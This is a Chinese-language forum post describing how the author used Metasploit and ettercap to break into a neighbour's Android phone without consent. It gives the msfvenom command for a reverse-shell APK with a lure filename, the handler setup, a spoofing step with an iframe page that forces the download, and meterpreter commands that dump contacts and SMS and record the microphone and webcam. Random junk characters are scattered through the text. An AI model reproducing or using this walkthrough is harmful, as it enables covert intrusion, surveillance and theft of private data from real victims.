metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

! E! R. j# q5 o z 五、msf+ettercap入侵邻居安卓手机 . V/ m. @( _$ u1 o

3 q/ n3 b9 }; E 首先启动msf + o2 A J% D" [6 B7 i8 {8 r

5 k, f3 l9 P8 F0 u 先用kali生成一个安卓木马，如下命令： / Q4 B& ]. q1 [& g, J

. g4 B! a/ b1 b' g Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 2 q% R$ h9 O) w9 U2 L& A; X

& v4 J- \6 A. m( e. V. |' L1 B 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 # ~& p8 o- S/ k% H; u

0 Y2 J* v! ]' n. m; C: ^ 然后进入msf ! \( K8 p" O) D/ G6 I1 A. i

+ d& q, f" j" K5 _/ S4 R% b1 ?. e) K- x use exploit/multi/handler w1 G3 {& u2 J$ N2 k

4 [2 D1 }6 ]- W5 o+ U8 f set payload android/meterpreter/reverse_tcp N( P; a$ @* u8 \: `

7 ?" r$ }: Y$ R/ N, \. P8 W$ h% ^8 @' L set LHOST 192.168.0.109 //ip为kaili的ip 0 \4 R* X/ v) f& [3 @3 P

7 @* n" b9 z5 r' p+ }3 M" h( E) z$ P set LPORT 44444 //端口一定要与前面生成的木马的端口一致 # ^ M* I& o/ {3 R+ L6 R- F

& c1 [4 o: C2 s Exploit . p) I4 l$ D/ i0 l; ^

" B- T- ]% D5 V& N5 ?. J 1 ^9 l, F8 R: ~9 ~6 D: t

* G, k' a3 F; u* N 下面我们开启ettercap -G * V* l: e; d+ e1 J, A

! q1 i" f# J2 W5 R: | 我物理IP为 6 Z2 ~0 V* S9 ~' n* Z! b

' o5 {) E0 S' Q1 N( X% B A/ D0 r2 P) Y1 \/ Y l

^5 U$ C! z8 n9 j9 I$ P g 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， " Z5 m4 n {7 p* P7 J& a c

& _7 c ?( ~, [% E) ^9 n$ T 下面我们来设置一下 5 J# W, z/ X% N! y( C+ b

* e( l, v/ R5 K" P0 ?$ S , I) ~: q5 B2 h, t/ J/ {4 a' }

2 [0 O4 M% G6 |: }2 n 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， + L3 p' [- ]3 X7 N1 Q

' u- U9 H) r) k2 Y3 w' \- Z$ `; o 3 G( {' A) [. @

5 q1 Y+ z& j/ d% u6 T+ u n7 e7 ]8 J# D s. ?# O

" v7 n% s6 Z; w" D5 K d a) Z ' m2 @0 s/ x& p& W. _, v& Q, S8 t+ S

2 @; V( _( {. C M0 r( O0 M 4 v4 }1 `: J7 `* _" Q2 m- C

- \4 o6 }5 {: ~0 O/ Z + T% [. V9 p# T. N- ^- g1 ^; G5 K

% @* {) {2 A" R. B3 m * f/ a3 k: Q0 q$ z# d: _6 f

) I4 c+ Y; ]+ y* ^ `) L) Q ) k8 k/ @& D# w: ]7 ?3 B; K: A8 b( F

* o1 |2 ~. G2 K4 g% d* q D) k% q/ J' ~

! _) p. k9 ]8 Z5 `" r. d& f ) t# E1 D+ }1 ^4 w+ J

0 j: P8 ?, O9 @& [) } 2 |6 Z8 X, h! `4 ]) l& k

5 W2 `8 E+ K3 }1 E ' w) U/ L1 m: y) [6 {+ [

4 _$ m5 I: _6 U k- I1 w ' ~5 A, h2 M7 ^& g9 y: H

& t: t8 p* d( E# W# G 7 r' i2 m1 w. o7 T; R" h

# q7 z1 V8 K j9 F1 e 下面我们开始攻击 ; t: x- R$ `- N+ Y

* N4 ?2 B( f. |8 g7 T. N) p+ m 8 I2 h6 G! n b( T& l5 f

! x2 \+ D$ `( n$ p& c ! i) G- w) c3 a+ X6 z3 A

* k- O2 |3 Z2 Z' _3 O 3 G* ~; s7 L- z2 g

6 E$ {: L8 a+ d9 s , a# G/ v) H* K9 `; m

+ x$ I# t' Y; q& R( y# L 6 c) @& B, \' N6 J& a4 S

2 C( A# t/ `" ?6 P. p$ R 大概过了5分钟多，发现反弹成功了 ! k! H* G/ ~; i$ _0 \0 s# `% }0 P0 Z

- C+ l; B& N+ \8 a( R3 D' a& `0 U 1 N1 k* U; W, b' e

5 m4 D9 d2 v8 x& y7 i7 i2 w( c" u* F 7 y) E" O {, f0 l1 Q

3 @ B% s. c$ E& j$ ?' C% a* \ 4 S1 H. y2 v. [, o s7 Z

& h( T$ L: d9 v2 {9 J' W6 w& l7 |) B) b$ X 3 W# E+ O, W) K* a

- V! o" }% W0 S* t' |6 Q + [# Z8 W( u9 \) t+ B0 f

6 w j9 h L s* l' @ M7 g( z4 A7 O 6 Q% V {& H5 d: x R4 x# Z

1 D2 P1 o2 p4 T, S. u B& P& R" w2 m 1 T5 n) Q( `& M3 h

$ }$ P1 b$ g; u5 q; O5 f* T 执行命令 6 O( {$ F( W7 A

: p, j7 K2 q- ?7 Y ; d. ?8 e2 D3 Q0 n8 R# @' R# A

Z. C, G# u/ \3 R5 t dump_contacts --》这个是导出电话 / p+ {) w. X w( G* ~: e

" a8 b2 P1 X& y1 [4 d0 ], F4 q dump_sms --》这个是导出信息 " P/ u% u! M l

* m, D! e- j& L) r/ g record_mic Record audio from the default microphone for X seconds " J d4 ?' N! o: w

* R$ l1 I' O- G! K, O" v0 v9 g webcam_chat Start a video chat ! d/ a1 b X! e, f

1 w) v' Z/ @" M! @% Z webcam_list List webcams " [5 `' g: ~; H4 N. m

8 M- ~0 ^9 R& Q# c/ Y# @$ |! \ webcam_snap Take a snapshot from the specified webcam ) t1 P8 E9 A# \8 L; V7 d8 S5 Z

, \3 I& u; k& d: Z0 O6 Z2 ` webcam_stream lay a video stream from the specified webcam $ F, |1 v' ?) V6 A& A# }9 o! i

! A+ F) d9 Z5 _2 G7 k , I% l/ P; o; Q, C: j

' S* K! U. Z+ ~$ c, y 1 c9 c7 E) y' g3 {

2 J* P$ v' }# E 我们打开看一下电话薄， 8 J. ^! h4 p' O. U2 F$ [

`: A' K+ c# z) ^! q8 i1 j % O+ B% y" x$ \$ s/ |4 X

$ c |! v8 o" J* T1 n# F& J 2 z$ Y: R2 t2 G& h& |6 c

9 \2 w, P$ } e7 u# q2 d. p $ N$ E3 a) L9 ?+ O: n" I+ P( T

8 o: [4 E. v7 \ e, D: T# y 4 d" B+ m% I8 b: {" h

0 E; u% F; d: X# ?3 v. J 1 F; |. r" i- Y6 D

3 p% s- J* W! Q4 |$ D( K - B. }+ o! b q3 E9 J, @, t0 A5 U3 x

) K# P) _0 U) T+ Y 我们同时欺骗成DroidJack木马，使用方法如图： 9 o, N/ _, ?2 c. J

0 b$ u& A+ F( m$ M1 N : K3 M7 y! D* K6 V5 i

9 v4 t: R2 Q5 q% ]2 \- M5 c; G0 @ * D! |8 U2 I: o$ s' R

$ q4 r) b8 j" y: F 2 d0 K4 b! q: p" Z8 \: o. {

( O* l! P& o7 A' l( }( A& N 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 ! e8 |! F w- U% \- U

* _. y6 w" N$ d3 }. A: C) S; V- j 7 B7 S, D& O5 P) G

1 G$ Y8 s! K' X6 A% } 0 R' Y' ^! D! z% @ L/ E5 h

3 `! c5 f1 F' \2 ?, X. p. a$ R 0 L$ z& `' O0 V$ Z% r

, T+ Q% l% R. h0 u! n 1 c- n n/ B" }8 @; j) k- ]+ v

) k; i3 N P: @( b* G0 a
2 ?9 n; _! Q( U& x3 J1 A# t L' v

		自动登录	找回密码
密码			立即注册